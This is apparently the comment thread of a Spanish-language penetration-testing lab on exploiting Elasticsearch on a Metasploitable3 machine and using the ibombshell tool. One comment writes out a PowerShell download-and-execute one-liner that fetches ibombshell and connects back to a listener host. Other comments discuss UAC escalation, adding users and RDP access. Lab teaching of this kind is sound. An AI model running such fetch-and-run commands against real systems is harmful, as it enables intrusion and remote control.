Explotación de Vulnerabilidades con Elasticsearch y Ibombshell

“Great power involves great responsibility”
Franklin D. Roosevelt
cita original
“Today we have learned in the agony of war that great power involves great responsibility. Today we can no more escape the consequences of German and Japanese aggression than could we avoid the consequences of attacks by the Barbary Corsairs a century and a half before.
We, as Americans, do not choose to deny our responsibility.”

Se puede escalar de privilegios en un objetivo mediante el UAC, donde igual podemos obtener la contraseña de inicio de sesión.

Tengo una duda. y viene referente al comentario anterior.
supongamos que no creo el usuario remoto. ya que al momento de explotar el elasticsearch, nos da permisos de administrador.

podriamos ejecutar el powershell desde lineas de comandos llendo ala direccion.
C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
desde alli suministrar el comando.
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
posteriormente.
console -Silently -uriConsole http://192.168.2.5:8080

Al ejecutar el payload dice “java has not been ecexuted, aborting…” y no me deja ingresar a la máquina metasplotable

Buen dia profe, tengo problemas al ejecutar el ibombshell, me aparece el siguiente error https://imgur.com/qBumcEY aun asi teniendo el python 3.6 https://imgur.com/QApoeyB mas sin envargo leyendo entre el post de github note que hay que tener instalado powershell en el kali, el problema esta que al instalarlo siguiendo los pasos desde la pagina https://www.kali.org/tutorials/installing-powershell-on-kali-linux/ ya al final me salta el siguiente error https://imgur.com/f9ILSQm y de hay no he podido pasar

Buena lectura

Buenas tardes.cuando ejecuto el exploit multi/elasticsearch me dice que est :java has no be executed,aborting.Por que puede ser?

muchas gracias

Excelente laboratorio.

Duda, siguiendo los pasos me doy cuenta que la opción de acceso remoto se encuentra deshabilitada por defecto. como podría activarla desde la shell(cmd) que se creo.

ya que trato de conectarme via rdesktop ip -u “usuario” -p “contraseña” y la coneccion es unable.
probe desde una terminal windows (cliente remoto) y sigue presentandose.

Excelente documento.
Pregunta. Tengo problemas para abrir Nessus, me dice que la base de datos esta corrupta. He buscado pero no logro solucionarlo. Algun companero con el mismo problema?

¿Cómo llegamos a la conclusión que el equipo metasploitable tiene la vulnerabilidad de elasticsearch? He ralizado un escaneo con Nessus y no ha encontrado dicha vulnerabilidad. Gracias.

Muy util esta Practica, sin embargo me toco para efectos del ejercicio crear el usuario pedro directamente en la maquina con metaexploitable3 ya que el creado a través de Kali nunca lo vi reflejado.
Posterior a lo anterior es una excelente clase…

Hola a todos
Disculpen para que se creó ibombshell y que es eso de los guerreros (warriors)
y de paso alguien puede explicar que se está haciendo exactamete a partir de que empezamos con lo de ibombshell
porfa alguien que mande mas info porque me quedé a medias JSJSJS 🤣🤣🤣🤣

Excelente practica, sin embargo al crear desde mi maquina de Kali el usuario pedro este nunca se me vio reflejado en la maquina donde esta instalado el metaexploitable3, por lo anterior y para efectos del laboratorio la cree directamente pudiendo así realizar la practica.

de esta practica me quedo la inquietud de si al momento de crear el usuario pedro nunca le asigne privilegios de administrador como como podría a través de este ejecutar Powershell?.

En líneas generales me parece un laboratorio muy interesante y enriquecedor.